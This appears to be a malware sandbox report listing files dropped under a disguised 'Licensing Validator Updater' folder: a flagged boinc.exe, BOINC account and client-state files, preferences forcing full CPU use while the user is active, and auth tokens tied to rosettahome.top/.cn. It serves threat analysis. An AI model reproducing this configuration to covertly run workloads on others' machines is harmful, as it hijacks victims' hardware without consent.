                                                                                                                                                                                                                                                                                                                                                      Size (bytes):240
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.507054532015214
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:6:8AfiM5xlhpw3fCNAZMQAG+eXKlLAGd7G19td7GVdJ:8eiufXw3qSZMQAG+eMLAGUtgdJ
                                                                                                                                                                                                                                                                                                                                                      MD5:3A2997418EDDAC7083B06B4EAE2CF413
                                                                                                                                                                                                                                                                                                                                                      SHA1:AEB63D04B573AE112D1DB79723D51B97FE7B30A0
                                                                                                                                                                                                                                                                                                                                                      SHA-256:0C2A61F8E1202100185822073CD22CE50F27C94C8EC189545627347405E92FEC
                                                                                                                                                                                                                                                                                                                                                      SHA-512:B0AD25A7742364013990062967BD406A47DE860F0FF709EB531128C1B00ECC2B1B5E84C8C551603A308A9AFBB9C3ACDF9255EA082987C99DD5B56307E8D99822
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:<account>..<master_url>http://rosettahome.top/rosettahome/</master_url>..<authenticator>1_dfdacac1d4e91a74e91cfc18f518e1de</authenticator>..<project_name>rosettahome</project_name>..<project_preferences> </project_preferences>..</account>..

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Licensing Validator Updater\boinc.exe

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):5900128
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.681603016700632
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:98304:6+2pAHOueLXU0GbPaJXlr99CvGisAbPwCWTxvXXE+NKTyqp+:6JAHOueLXfCPaJXlr99Cvt3b4CYxvXXV
                                                                                                                                                                                                                                                                                                                                                      MD5:760F00E30887017CDEA9809FD1C38E52
                                                                                                                                                                                                                                                                                                                                                      SHA1:B09271E96FF73B86BD54489FBAE1C224369A8BC8
                                                                                                                                                                                                                                                                                                                                                      SHA-256:91E405E8A527023FB8696624E70498AE83660FE6757CEF4871CE9BCC659264D3
                                                                                                                                                                                                                                                                                                                                                      SHA-512:C0AAE4972748EF1E522B1B8230AB5A3A538AB4CC0F19773B359C4BC0CCB6357DC6D6F51913CB1B64F682595D9C8E6A1F5C8D60EB13A264BE2AA9E453FF1B5CCB
                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$............ln..ln..ln...m..ln...k.-ln...j..ln.<..ln.<.j..ln.<.m..ln.<.k..ln...o..ln..lo..mn.....ln.....ln..ln..ln...j..on...k..ln....ln..l...ln...l..ln.Rich.ln.........................PE..d....Pf.........."....'..@...!......`#........@..............................b.....C.[...`...................................................Q.,....P^.@.....Z.Dq....Y.`'...`a.`....4O.T....................6O.(...p3O.@.............@..............................text...|.@.......@................. ..`.rdata...Q....@..R....@.............@..@.data...t.... R.......R.............@....pdata..Dq....Z..r....R.............@..@_RDATA.......0]...... U.............@..@.rsrc...@....P^......2V.............@..@.reloc..`....`a......<Y.............@..B................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Licensing Validator Updater\cc_config.xml

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:exported SGML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):223
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.691902088936175
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:6:pLC5sc4G/sRQZXzcw1MAScXzcwwW+u6+SBKHwxJQCb:s5s+/swYw1MeYwwLcoKHwTXb
                                                                                                                                                                                                                                                                                                                                                      MD5:3A49BC4F7A44C92F2E766E784D9ED5B3
                                                                                                                                                                                                                                                                                                                                                      SHA1:9F6563DD161E57BF07AF35ED13151113461DCCEF
                                                                                                                                                                                                                                                                                                                                                      SHA-256:1E51697B5E87C3F799636DAACEC8D9326FB70B317D2E96A1CD5D3FAF27BB1732
                                                                                                                                                                                                                                                                                                                                                      SHA-512:40F344036CD4D1E3BD8553F6B3C2D00377FDA8CCBB1C7FB8000942FBF68F1FE43C553F574AAB0C176FA16378F226010B755F3365419171568EF0100244D0E2B9
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:<cc_config>.. Automatically retry connection to the project -->.. ..<options>..<report_results_immediately>1</report_results_immediately>..<skip_cpu_benchmarks>1</skip_cpu_benchmarks>..</options>..........</cc_config>

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Licensing Validator Updater\client_state.xml (copy)

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (399), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):6228
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.036751633419772
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:96:fpsafz53TVvsbsiamq52epeVEShUi0NpbBre6n3jx:fPzLEbsiamWfEUi0zbBrZnTx
                                                                                                                                                                                                                                                                                                                                                      MD5:271798748AE773D9D5DB7E111AECBA5B
                                                                                                                                                                                                                                                                                                                                                      SHA1:A88432D2569EB07BC16473DF5FC9ED0B9AC2AB01
                                                                                                                                                                                                                                                                                                                                                      SHA-256:020E4BF7FD4E4BD69650F49FC956F785997B98DCB256FD1D67A986DEDA0A3548
                                                                                                                                                                                                                                                                                                                                                      SHA-512:219BFB7B017A18852FE5B6CB35157B891CB6BA42A8EF9D1B556901EF1D1A0CABBE0CC0D57250ADE4CB6786967166E0A9FB17BE5432EED5E37B60D21AFAF4AE7B
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:<client_state>..<host_info>.. <timezone>-18000</timezone>.. <domain_name>932923</domain_name>.. <ip_addr>192.168.2.16</ip_addr>.. <host_cpid>311d0ac0ca7255c56948c5bdd0f525cd</host_cpid>.. <p_ncpus>4</p_ncpus>.. <p_vendor>GenuineIntel</p_vendor>.. <p_model>Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz [Family 6 Model 143 Stepping 8]</p_model>.. <p_features>fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ss htt pni pclmulqdq ssse3 fma cx16 sse4_1 sse4_2 movebe popcnt aes f16c rdrandsyscall nx lm avx avx2 avx512f avx512dq adx avx512ifma avx512cd avx512bw avx512vl avx512vbmi avx512_vbmi2 gfni vaes vpclmulqdq avx512_vnni avx512_bitalg avx512_vpopcntdq fsgsbase bmi1 smep bmi2</p_features>.. <p_fpops>1000000000.000000</p_fpops>.. <p_iops>1000000000.000000</p_iops>.. <p_membw>1000000000.000000</p_membw>.. <p_calculated>1736883984.568863</p_calculated>.. <p_vm_extensions_disabled>0</p_vm_extensions_disabled>..

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Licensing Validator Updater\client_state_next.xml

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (399), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):6228
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.036751633419772
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:96:fpsafz53TVvsbsiamq52epeVEShUi0NpbBre6n3jx:fPzLEbsiamWfEUi0zbBrZnTx
                                                                                                                                                                                                                                                                                                                                                      MD5:271798748AE773D9D5DB7E111AECBA5B
                                                                                                                                                                                                                                                                                                                                                      SHA1:A88432D2569EB07BC16473DF5FC9ED0B9AC2AB01
                                                                                                                                                                                                                                                                                                                                                      SHA-256:020E4BF7FD4E4BD69650F49FC956F785997B98DCB256FD1D67A986DEDA0A3548
                                                                                                                                                                                                                                                                                                                                                      SHA-512:219BFB7B017A18852FE5B6CB35157B891CB6BA42A8EF9D1B556901EF1D1A0CABBE0CC0D57250ADE4CB6786967166E0A9FB17BE5432EED5E37B60D21AFAF4AE7B
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:<client_state>..<host_info>.. <timezone>-18000</timezone>.. <domain_name>932923</domain_name>.. <ip_addr>192.168.2.16</ip_addr>.. <host_cpid>311d0ac0ca7255c56948c5bdd0f525cd</host_cpid>.. <p_ncpus>4</p_ncpus>.. <p_vendor>GenuineIntel</p_vendor>.. <p_model>Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz [Family 6 Model 143 Stepping 8]</p_model>.. <p_features>fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ss htt pni pclmulqdq ssse3 fma cx16 sse4_1 sse4_2 movebe popcnt aes f16c rdrandsyscall nx lm avx avx2 avx512f avx512dq adx avx512ifma avx512cd avx512bw avx512vl avx512vbmi avx512_vbmi2 gfni vaes vpclmulqdq avx512_vnni avx512_bitalg avx512_vpopcntdq fsgsbase bmi1 smep bmi2</p_features>.. <p_fpops>1000000000.000000</p_fpops>.. <p_iops>1000000000.000000</p_iops>.. <p_membw>1000000000.000000</p_membw>.. <p_calculated>1736883984.568863</p_calculated>.. <p_vm_extensions_disabled>0</p_vm_extensions_disabled>..

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Licensing Validator Updater\client_state_prev.xml (copy)

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (399), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):6228
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.036751633419772
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:96:fpsafz53TVvsbsiamq52epeVEShUi0NpbBre6n3jx:fPzLEbsiamWfEUi0zbBrZnTx
                                                                                                                                                                                                                                                                                                                                                      MD5:271798748AE773D9D5DB7E111AECBA5B
                                                                                                                                                                                                                                                                                                                                                      SHA1:A88432D2569EB07BC16473DF5FC9ED0B9AC2AB01
                                                                                                                                                                                                                                                                                                                                                      SHA-256:020E4BF7FD4E4BD69650F49FC956F785997B98DCB256FD1D67A986DEDA0A3548
                                                                                                                                                                                                                                                                                                                                                      SHA-512:219BFB7B017A18852FE5B6CB35157B891CB6BA42A8EF9D1B556901EF1D1A0CABBE0CC0D57250ADE4CB6786967166E0A9FB17BE5432EED5E37B60D21AFAF4AE7B
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:<client_state>..<host_info>.. <timezone>-18000</timezone>.. <domain_name>932923</domain_name>.. <ip_addr>192.168.2.16</ip_addr>.. <host_cpid>311d0ac0ca7255c56948c5bdd0f525cd</host_cpid>.. <p_ncpus>4</p_ncpus>.. <p_vendor>GenuineIntel</p_vendor>.. <p_model>Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz [Family 6 Model 143 Stepping 8]</p_model>.. <p_features>fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ss htt pni pclmulqdq ssse3 fma cx16 sse4_1 sse4_2 movebe popcnt aes f16c rdrandsyscall nx lm avx avx2 avx512f avx512dq adx avx512ifma avx512cd avx512bw avx512vl avx512vbmi avx512_vbmi2 gfni vaes vpclmulqdq avx512_vnni avx512_bitalg avx512_vpopcntdq fsgsbase bmi1 smep bmi2</p_features>.. <p_fpops>1000000000.000000</p_fpops>.. <p_iops>1000000000.000000</p_iops>.. <p_membw>1000000000.000000</p_membw>.. <p_calculated>1736883984.568863</p_calculated>.. <p_vm_extensions_disabled>0</p_vm_extensions_disabled>..

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Licensing Validator Updater\coproc_info.xml

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):156
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.5050428683154795
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Njd9syLHrFkd8KbMeoLHkxsFJ4QoeoLHqVuezGhKbMEK9sn:NsurFkOKMeYhFaxeYzeOKM5sn
                                                                                                                                                                                                                                                                                                                                                      MD5:D17136C437A82A18A5327E7E87C6CA0D
                                                                                                                                                                                                                                                                                                                                                      SHA1:CBB6B4FDB4A0F50DA4DF718F64A0B937DF4DB39F
                                                                                                                                                                                                                                                                                                                                                      SHA-256:512D84B36726F77BFF204DBC45E9FC06C9378A67084551308AE1AF77047DEA3E
                                                                                                                                                                                                                                                                                                                                                      SHA-512:450DFB04F34E037EAD51E932EE36A1710348FD75980051A81E8869EFA2125D73781BB3A76CFFB73E83B73520D69F15E58AF23498278F6543FC561E14B71060C9
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview: <coprocs>.<warning>No NVIDIA library found</warning>.<warning>No ATI library found.</warning>.<warning>No OpenCL library found</warning>. </coprocs>.

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Licensing Validator Updater\daily_xfer_history.xml (copy)

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):118
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.469520017712775
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:bpNy/ZyFFj+ALzVV/aFRqLXVgF/Z8WtdVVt4bKKPy0hdNyn:bmxy/j+APSFRqyR8Wtdl4Wcvyn
                                                                                                                                                                                                                                                                                                                                                      MD5:CB723FE22B7435EBEE570841E2E39F26
                                                                                                                                                                                                                                                                                                                                                      SHA1:BE8A67E0DACE13A6DE166A9D56FB14DEE7454A8E
                                                                                                                                                                                                                                                                                                                                                      SHA-256:3638C84734824C148862D42CD2E2693614C664101DFD84DE90D6F49DC6824645
                                                                                                                                                                                                                                                                                                                                                      SHA-512:2EB64AC821CA4FC6AF97B9FE8BCC539EE1791A0F24E773F9D542EABED8C57BFF021AE88DF6ABDCA2727B2BE2F91ABE3167D76415F5924BBD50E79DDCE9313E5F
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:<daily_xfers>..<dx>.. <when>20102</when>.. <up>0.000000</up>.. <down>6192.000000</down>..</dx>..</daily_xfers>..

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Licensing Validator Updater\global_prefs.xml

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):470
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.586712410605188
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12:AnxQlQax/nWTNKob7wMUvuDOHrJf1HJ7NKFwMUvyg2OV2se:AnxvaxRvuiJfZJiQvy7nse
                                                                                                                                                                                                                                                                                                                                                      MD5:F756B1A390E4072C8096934893D5E8F0
                                                                                                                                                                                                                                                                                                                                                      SHA1:50123BB651B10F0033C328E5D55641FDE5DE7CE0
                                                                                                                                                                                                                                                                                                                                                      SHA-256:915BED1FDE23885F8EEA96858BAC6832ED4443A84D1EF31E63CD0163BB2D76D8
                                                                                                                                                                                                                                                                                                                                                      SHA-512:056421B0CAB356051034BDF3799AEDE6E3562EC45CD6BA5E2CB07FB23D3F70443F419E8AA8C6011CDD433040ACDC335C9ECF9B62801F994961E533AD8571B803
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:<global_preferences>.. <run_on_batteries>1</run_on_batteries>..<max_cpus>4</max_cpus>.. <cpu_usage_limit>100.000000</cpu_usage_limit>.. <suspend_cpu_usage>100.000000</suspend_cpu_usage>..<cpu_scheduling_period_minutes>2.000000</cpu_scheduling_period_minutes>.. <run_if_user_active>1</run_if_user_active>.. <cpu_usage_limit>100.000000</cpu_usage_limit>.. <suspend_cpu_usage>0</suspend_cpu_usage>....<max_ncpus_pct>100.000000</max_ncpus_pct>.. </global_preferences>

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Licensing Validator Updater\gui_rpc_auth.cfg

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):32
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.757048827786958
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:DKXD0jWSRA1wUn:oeWSQX
                                                                                                                                                                                                                                                                                                                                                      MD5:EC9B1FC012E75CFD9AB949A5E67CC2D1
                                                                                                                                                                                                                                                                                                                                                      SHA1:767913963E4348CF634F84E62C33330175146131
                                                                                                                                                                                                                                                                                                                                                      SHA-256:3B1DD5E300C25807AAC5A63354133E7D9D1A2B3060C6DEC0FD292DDF1094FA8B
                                                                                                                                                                                                                                                                                                                                                      SHA-512:0102FA54E245C01B8113160F1136A4CCFB0241790D1301FADA54207635124791186DDB4767112817BAE3C67DB9E902F67B63BD38549C66BA9EBAD7EE7BE75EA5
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:c12382fb1dd64655eff9574e9a7f7d42

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Licensing Validator Updater\master_rosettahome.cn_rosettahome.xml

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):6192
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.705188161984223
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:96:+Lbrd/NddddddoQGOMJySMIp7Mt0wMr3E8V2rf8b5:+LROxOMoSMmMhMrEfU5
                                                                                                                                                                                                                                                                                                                                                      MD5:F5D0DDD9D44A2EFEC1BE2C26FB1B8E82
                                                                                                                                                                                                                                                                                                                                                      SHA1:3D83F1FE88387FD2AF9E62A25A475C2EDC707851
                                                                                                                                                                                                                                                                                                                                                      SHA-256:5F481DFB4031EABD4E89B25FCD801130EC914D97BDE647A800400303744A7771
                                                                                                                                                                                                                                                                                                                                                      SHA-512:85A95525CFF651C2A192123EAE938DB836602903F348A491AC66142B85E4D505F6F67BF7D1512E9F7218DF9B6828584E4128B17496250A42AE6FC91AD38B90FD
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:<!DOCTYPE html>. <html lang="en">. <head>. . <meta name="viewport" content="width=device-width, initial-scale=1">. . <scheduler>http://rosettahome.top/rosettahome_cgi/cgi</scheduler> -->.<link rel="boinc_scheduler" href="http://rosettahome.top/rosettahome_cgi/cgi">. <title>REPLACE WITH PROJECT NAME</title>.. <meta charset="utf-8">. . <link type="text/css" rel="stylesheet" href="http://rosettahome.cn/rosettahome//bootstrap.min.css" media="all">. . <link rel=alternate type="application/rss+xml" title="RSS 2.0" href="http://rosettahome.cn/rosettahome/rss_main.php">. </head>. <body >. SVN VERSIONS -->. $Id$ -->. $Id: pm.inc 14019 2007-11-01 23:04:39Z davea $ -->. $Id$ -->. $Id$ -->. $Id$ -->. $Id$ -->. $Id$ -->. $Id$ -->. $Id$ -->.<div class="container-fluid">. <img class="img-responsive" style="width:100%" src="img/water.jpg"><nav class="navbar navbar-default">..

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Licensing Validator Updater\master_rosettahome.top_rosettahome.xml

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):6192
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.705188161984223
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:96:+Lbrd/NddddddoQGOMJySMIp7Mt0wMr3E8V2rf8b5:+LROxOMoSMmMhMrEfU5
                                                                                                                                                                                                                                                                                                                                                      MD5:F5D0DDD9D44A2EFEC1BE2C26FB1B8E82
                                                                                                                                                                                                                                                                                                                                                      SHA1:3D83F1FE88387FD2AF9E62A25A475C2EDC707851
                                                                                                                                                                                                                                                                                                                                                      SHA-256:5F481DFB4031EABD4E89B25FCD801130EC914D97BDE647A800400303744A7771
                                                                                                                                                                                                                                                                                                                                                      SHA-512:85A95525CFF651C2A192123EAE938DB836602903F348A491AC66142B85E4D505F6F67BF7D1512E9F7218DF9B6828584E4128B17496250A42AE6FC91AD38B90FD
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:<!DOCTYPE html>. <html lang="en">. <head>. . <meta name="viewport" content="width=device-width, initial-scale=1">. . <scheduler>http://rosettahome.top/rosettahome_cgi/cgi</scheduler> -->.<link rel="boinc_scheduler" href="http://rosettahome.top/rosettahome_cgi/cgi">. <title>REPLACE WITH PROJECT NAME</title>.. <meta charset="utf-8">. . <link type="text/css" rel="stylesheet" href="http://rosettahome.cn/rosettahome//bootstrap.min.css" media="all">. . <link rel=alternate type="application/rss+xml" title="RSS 2.0" href="http://rosettahome.cn/rosettahome/rss_main.php">. </head>. <body >. SVN VERSIONS -->. $Id$ -->. $Id: pm.inc 14019 2007-11-01 23:04:39Z davea $ -->. $Id$ -->. $Id$ -->. $Id$ -->. $Id$ -->. $Id$ -->. $Id$ -->. $Id$ -->.<div class="container-fluid">. <img class="img-responsive" style="width:100%" src="img/water.jpg"><nav class="navbar navbar-default">..

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Licensing Validator Updater\notices\archive_rosettahome.cn_rosettahome_notices.php.xml

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):23
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.567040216926579
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:BhMGC:8B
                                                                                                                                                                                                                                                                                                                                                      MD5:6B0A8CC3F90BFEA8C69440F259D95BA4
                                                                                                                                                                                                                                                                                                                                                      SHA1:99EE4A003CA2C5499E90CB6A64BC3960850AA7AF
                                                                                                                                                                                                                                                                                                                                                      SHA-256:269B3AD12D598980B0EB1673443E84FAC6D7F2B66639B2B72F284DDFB38FD7D9
                                                                                                                                                                                                                                                                                                                                                      SHA-512:3138782F8ECBDE11BB70FB2825656432862EA62DCA20CEDF25947DD26122E92A40F9CDD09D717827F7BD98BA3E210E30F4F23C332BEFD82133999E845CC865EF
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:<notices>..</notices>..

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Licensing Validator Updater\notices\feeds.xml

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):267
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.950202445827279
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:6:RANF/u1i8LJsE9rkdd9QAnASep5dHpOksaWwRwu:+F/u1iNdq0NeXdsrwRv
                                                                                                                                                                                                                                                                                                                                                      MD5:59E58FBBFEA295E359C0B3DDCE4E5E6D
                                                                                                                                                                                                                                                                                                                                                      SHA1:8D1528A293A61E19D536624A3D24216F4696AC97
                                                                                                                                                                                                                                                                                                                                                      SHA-256:A59DBB66285D0A209D78858BDA62C0824CA4E88AE69DBDE5202D033DAB5A2209
                                                                                                                                                                                                                                                                                                                                                      SHA-512:5C912089D417A8352358EF6586A4352BACE4181433B087A3E0ECC33ED824E1C95934AE94D646768890FEB27F0874E209F4EF7A7BF7F168CDD6EE10D1D4E2D788
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:<rss_feeds>.. <rss_feed>.. <url>http://rosettahome.cn/rosettahome/notices.php?userid=1&amp;auth=1_1a362b2ad50985e203845fe44682096e</url>.. <poll_interval>86400.000000</poll_interval>.. <next_poll_time>0.000000</next_poll_time>.. </rss_feed>..</rss_feeds>..

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Licensing Validator Updater\notices\feeds_rosettahome.cn_rosettahome.xml

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):267
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.950202445827279
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:6:RANF/u1i8LJsE9rkdd9QAnASep5dHpOksaWwRwu:+F/u1iNdq0NeXdsrwRv
                                                                                                                                                                                                                                                                                                                                                      MD5:59E58FBBFEA295E359C0B3DDCE4E5E6D
                                                                                                                                                                                                                                                                                                                                                      SHA1:8D1528A293A61E19D536624A3D24216F4696AC97
                                                                                                                                                                                                                                                                                                                                                      SHA-256:A59DBB66285D0A209D78858BDA62C0824CA4E88AE69DBDE5202D033DAB5A2209
                                                                                                                                                                                                                                                                                                                                                      SHA-512:5C912089D417A8352358EF6586A4352BACE4181433B087A3E0ECC33ED824E1C95934AE94D646768890FEB27F0874E209F4EF7A7BF7F168CDD6EE10D1D4E2D788
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
